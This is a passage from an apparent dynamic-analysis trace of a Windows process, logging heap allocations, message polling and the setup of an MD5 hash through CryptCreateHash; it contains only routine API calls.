hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0240.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0240.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.896] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0240.896] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0240.896] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0240.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0240.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.896] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0240.896] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0240.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0240.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0240.896] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0240.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.897] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0240.897] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0240.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0240.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.897] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0240.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0240.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e512f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0240.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0240.898] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0240.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0240.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.898] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0240.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0240.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0240.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0240.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0240.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0240.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0240.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0240.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0240.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0240.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0240.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0240.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0240.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0240.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0240.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0240.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0240.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0240.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0240.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0240.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0240.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0240.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0240.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0240.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0240.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0240.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0240.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55008 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0240.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0240.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0240.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0240.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0240.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0240.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0240.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0240.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0240.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0240.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0240.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0240.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0240.903] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0240.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0240.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0240.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0240.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f48 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0240.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0240.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0240.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0240.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0240.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0240.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0240.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ff8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0240.905] PeekMessageW (in: 